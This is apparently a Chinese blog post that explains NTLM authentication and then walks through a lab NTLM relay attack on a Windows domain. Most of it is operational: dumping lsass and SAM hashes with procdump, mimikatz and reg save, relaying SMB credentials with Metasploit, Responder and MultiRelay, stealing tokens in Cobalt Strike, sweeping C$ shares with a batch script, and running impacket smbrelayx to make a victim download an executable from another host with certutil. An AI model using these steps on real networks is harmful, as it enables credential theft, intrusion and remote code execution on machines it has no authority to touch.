首页 > 其他分享 >NTLM协议&relay重放攻击

NTLM协议&relay重放攻击

时间:2023-12-11 15:02:00浏览次数:30  
标签:hash relay 主机 NTLM 192.168 然后 重放 进行

NTLM协议学习

NTLM是NT LAN Manager的缩写,是telnet的一种验证身份的方式,分为本地认证和网络认证,当我们登录主机的时候,就会将lsass.exe进程转换的明文密码hash与sam文件进行对比,如果相同说明认证成功就能成功登录,而网络认证就是当我们访问同于局域网的主机的SMB共享时,就需要提供凭证通过验证才能访问。

本地认证NTML

本地认证流程:用户输入密码,然后系统收到密码之后计算成NTLM hash,然后和本地文件 /config/sam 数据库中该用户的hash进行对比,如果相同就登录成功,如果不相同就登录失败,这个sam文件可以使用mimikatz进行提取,也可以使用msf和cs进行提取,如果考虑杀软可以将lsass.exe的数据进行导出,然后放在本地,使用mimikatz和procdump.exe进行读取

procdump.exe -accepteula -ma lsass.exe lsass.dmp   //这个dmp就是导出的文件,直接找到lsass.exe进程然后右键导出即可
// 使用mimikatz提取sam文件数据
提升权限
privilege::debug
读取文件,并提取数据
sekurlsa::logonpasswords
也可以使用命令

也可以使用注册表进行导出

reg save hklm\sam sam.hive
reg save hklm\system system.hive


然后使用mimikatz进行读取

// 需要将文件放在mimkatz的同一文件夹
lsadump::sam /sam:sam.hive /system:system.hive


NTLM hash的加密流程

将明文口令转换成十六进制,转换成Unicode格式,然后对Unicode字符串进行MD4加密,这个结果就是32位的十六进制NTLMhash

以上的就是sam文件的读取也就是获取用户的NTLM值和本地NTLM的认证方式

NTLM hash的格式

当我们对NTLM hash进行查询的时候有的时候会出现这样的格式

Administrator:501:AAD3B435B51404EEAAD3B435B51404EE:XXXX

这个前面的501是用户的标识符,然后后面的第二部分是LM hash在windows vista和windows server 2008版本之后就默认禁用LM hash所以抓到的hash如果是"AAD3B435B51404EEAAD3B435B51404EE"说明此主机禁用了LM hash或者为空,最后的一部分就是NT hash

NET-NTLM 认证(网络认证)

这个是用于工作组或者域环境的认证,比如我们在访问同一局域网的一台主机的SMB共享服务的时候就需要提供认证才能进行访问

认证的流程

工作组的认证流程:

1 客户端向服务端发起用户信息的请求,这个请求包含用户名和想要访问的资源信息等

2 服务端接收到了用户的请求,判断本地用户是否存在客户端发送的用户名,如果存在,就会生成一个16位的Challenge,客户端接收到这个Challenge就使用本地用户的NTLM hash来生成一个response,如果使用net use xxx 用户名和密码,就会使用命令提供的账号和密码对Challenge进行加密,这个加密的response(就是通过NTLM hash加密的Challenge)就是NET-NTLM hash,在中继攻击的时候也是获取这个值进行攻击的。

3 客户端发送加密好的这个hash发送给服务端,服务端也会使用本地的用户的NTML对Challenge进行加密,然后和客户端发送的这个加密值进行对比,如果相同就验证成功就能正常提供连接,反之失败

域环境的认证流程:

1 在域环境中域内的机器中的SAM文件中不存在域用户的NTLM hash ,所以服务器将客户端的用户名 Challenge reponse通过Netlogon协议发送到域控主机,让域控对这个客户端进行验证是否是域内合法的机器,也就是对这个机器进行身份验证

2 域控接收服务端发送的请求,在自己的ntds.dit中查询是否存在这个域用户,如果存在就使用对应的NTLM hash对Challenge进行加密,最后与服务端发送的NET-NTLM hash进行对比,如果相同,说明是域内的这个机器拥有的密码是正确的,确认了是存在且正常的用户,然后将验证结果发送给服务器

3 服务端接收到域控返回的验证结果,判断是否成功,如果验证成功说明可以提供连接,反之拒绝连接

Net-NTML-Hash的格式如下

username:domain:challenge:NTProofStr:blob

NTLM Relay攻击

原理:利用NTLM协议漏洞,将用户的身份验证信息中继到攻击者控制的计算机上面,从而实现对目标计算机的攻击,可以进行敏感信息的窃取和系统的完全控制。其中的原理核心就是当域内主机进行比如smb服务的访问时,首先使用的就是当前用户的账号和密码进行验证,如果验证失败对方主机就直接拒绝访问,反之成功,也就是说这个攻击需要域内主机的账号和密码都相同才能攻击成功

实验:使用msf+cs进行NTLMrelay攻击实验

kali:192.168.9.16 cs + msf

域控密码:dc2012@

受害主机:windows server 2008 192.168.9.54 本地 administrator/123321Zxc 域账号am:amanagent#1

攻击主机 :windows 7 192.168.9.53 本地 administrator/123321Zxc 域账号:am:amanagent#1

当主机都用本地管理员进行登录:

windows server 2008

win 7:

问题:切换本地administrator账号提示该账号被禁用,使用dc进行修改无法修改成功

解决:使用域控账号登录主机然后使用管理员权限进行修改

如果没有设置管理员账号密码就得先设置密码
// net user administrator *
之后输入密码即可
第二步就是激活管理员账户
net user administrator /active:yes,之后就能正常使用本地管理员账号进行登录


win7使用smb进行连接尝试

net use \\192.168.9.54c$


直接就连接成功

然后清除连接,将win7使用其他用户进行登录

删除连接:net use \\192.168.9.53\c$ /delete


之后再次使用53主机重新进行尝试连接显示

说明只能是当前登录用户的账号密码相同才能成功

使用cs先创建一个木马让攻击机器上线

然后使用插件进行提权

之后把这个会话回传到msf

先创建一个msf的监听

之后在cs执行spawn msf就能将这个会话转入到msf,首先msf进行监听


然后run进行监听

cs执行命令

然后需要设置路由

run autoroute -p 查看当前的路由

没有路由所以得自己添加就运行给的命令即可,如果在实际攻击中kali主机是一般是外网的就必须设置路由并且目标不出网还得将攻击的payload修改成正向连接,就是bind模式

run post/multi/manage/autoroute


然后使用smb协议的relay攻击模块

use exploit/windows/smb/smb_relay

这里设置攻击目标 set smbhost xxx

然后还得进行一个设置

set autorunscript post/windows/manage/migrate

最后直接run

然后在53主机上切换administrator用户执行dir \192.168.9.16\c$就能获得一个54的session

进入session进行查看权限

这里成功的原理其实就是将自己的密码通过kali进行中继到54个主机然后进行匹配连接。

在实际环境中并不能直接登录主机进行切换administrator主机进行执行命令,所以就可以使用msf或者cs中的窃取权限到administrator就可以了,然后再执行命令即可

cs中:

执行命令

ps查看进程

然后找到administrator权限运行的进程,记录pid使用命令进行窃取

steal_token 2384

然后查看权限

然后再执行

dir \\192.168.9.16\c$ # 也可以使用net use命令

然后查看是否有shell得到

得到shell查看权限

第二种就是利用msf进行窃取权限进行releay重放

首先设置好攻击主机,我这里设置的是192.168.9.54,然后还得设置这个 set autorunscript post/windows/manage/migrate,每一次新的攻击都得重新设置,不然会报错不能成功

然后进行run状态

再执行sessions进入53的session执行命令ps查看进程然后记录administrator的进程pid

然后执行命令进行窃取权限

migrate 876

查看权限

然后在执行dir的命令进行访问kali

就直接是54的system权限

域内批量进行releay攻击方法

写一个bat脚本传入获得权限的主机然后进行查看,如果能够执行成功并且返回不是错误,就证明这些主机可以进行攻击

@echo off
setlocal EnableDelayedExpansion   // 这个就是启用了延迟变量,这个就是可以使用!!对变量进行改变复制

set "startIP=50"
set "endIP=70"

echo Testing connectivity...
for /L %%i in (%startIP%, 1, %endIP%) do (
    set "ip=192.168.9.%%i"
    echo Testing !ip!...
    dir \\!ip!\c$ > nul 2>&1
    if !errorlevel! == 0 (
        echo !ip! is reachable.
    ) else (
        echo !ip! is not reachable.
    )
    设置延迟,防止执行后一直卡住,提高测试效率
    timeout /t 3 > nul
)

endlocal

效果

中继攻击获取hash

使用responder+Multirelay获取权限

首先使用kali的responder进行监听网卡

// 这里需要设置 /usr/share/responder下面的conf工具关闭smb和http的选项
responder -I eth0 -wd

然后启动Multirelay工具攻击54主机

python multrirelay.py -t 192.168.9.54 -u ALL

然后在53主机执行命令

dir \192.168.9.16\c$

然后在kali中就能获得54的权限

还有使用impacket套件进行使用,因为在实际环境中,监听网卡并不能很好的进行渗透测试

比如 192.168.9.16是我们的外网vps主机,将impacket套件进行上传然后执行下面的指令,下载木马

proxychains4 python3 smbrelayx.py -h 192.168.9.54 -c "certutil.exe -urlcache -split -f http://192.168.9.52/6689.exe 2233.exe"

然后就会进行执行,当然代理的网络很慢,等待一下就能下载成功,下一步就执行木马进行上线即可。

标签:hash,relay,主机,NTLM,192.168,然后,重放,进行
From: https://www.cnblogs.com/ArcherCY/p/17894416.html

相关文章

  • ESP 8266 RELAY V3 调试说明
    ESP8266继电器模块V3是一个非常方便的设备,可以用于控制各种类型的继电器。以下是调试该模块的一些说明:连接设备:首先,将ESP8266继电器模块V3连接到计算机或其他调试设备上。您可以使用USB转TTL串口线来连接设备。确保正确连接并给设备上电。配置设备:在开始调试之前,您需要配置ESP8266......
  • DHCPV6 relay
    核心配置PC:1)配置调用dhcpinterfaceGigabitEthernet0/0/0ipv6enable ipv6addressautolink-localundoipv6ndrahaltipv6addressautodhcp2)配置路由ipv6route-static::0GigabitEthernet0/0/0FE80::2E0:FCFF:FE8F:7AD4R1:interfaceGigabitEthernet0/0/0ipv......
  • NTLM
    NTLMSSPI和SSPSSPISSPI(SecuritySupportProviderInterface),即安全服务提供接口,这是Windows定义的一套接口,该接口定义了与安全有关的功能函数,包含但不限于:身份验证机制信息完整性为其他协议提供的会话安全机制SSPSSP(SecurityServiceProvider),即安全服务提供,它是......
  • DNS Proxy(DNS 代理)与DNS Relay(DNS中继)的功能实现差异
     DNSProxy:  (1)接收到DNSClient(客户端)的DNS请求后先查找本地域名解析表。  (2)如果未查询到对应的解析表项,再将DNS请求报文转发给DNSServer(服务器)。  (3)DNSServer接收到请求报文解析之后,将解析到的IP和域名的对应关系缓存到本地。  (4)如果DNSServer上域名与IP地址发......
  • arcgis for js4.x自定义Graphic数组创建FeatureLayer添加标注
    varpoint=[{ "geometry":{ "x":116.820688, "y":33.974053, "spatialReference":{ "wkid":4326 } }, "......
  • NTLM认证协议
    NTLM认证协议介绍NTLM(NTLANManager)最早使用在WindowsNT操作系统,被广泛应用于工作组和域环境。现在在一些旧系统或者老的应用程序可能还在使用,用于用户身份验证(在网络上验证用户的身份,以便他们可以访问共享资源,如文件、打印机和应用程序)。NTLM协议的认证,包括NTLMv1和N......
  • ArcGIS Map SDK FeatureLayer点击查询要素与弹框展示
    ArcGISMapSDKFeatureLayer点击查询要素与弹框展示代码如下:<htmllang="en"><head><metacharset="utf-8"/><metaname="viewport"content="initial-scale=1,maximum-scale=1,user-scalable=no&quo......
  • DHCP-relay
    需求分析1、R1为dhcp服务器2、R2为中继3、二层交换,网段为10.1.1.0具体配置R1:<r1>displaycurrent-configuration [V200R003C00]#sysnamer1#snmp-agentlocal-engineid800007DB03000000000000snmp-agent #clocktimezoneChina-Standard-Timeminus08:00:00#por......
  • 28、中继配置DHCP服务(relay模式)
    中继配置的意义:DHCP服务器与DHCP客户端不在同一网段内,避免每一个网段都布置DHCP服务,DHCP中继负责DHCP服务器与DHCP客户端之间的DHCP报文转发。1、拓扑如下2、交换机配置 SW2的配置如下Thedeviceisrunning!<Huawei>sysEntersystemview,returnuserviewwithCtrl......
  • docker 安装 Influxdb-relay 使用
    1.influxdbrelay的作用和特性数据转发:InfluxDBRelay可以从一个或多个源(input)接收数据,并将其转发到一个或多个目标(output)的InfluxDB实例中。负载均衡:Relay可以通过在多个目标实例之间分配请求来提供负载均衡,确保可伸缩性和高可用性。故障恢复:当某个目标实例发生故障时,Relay可......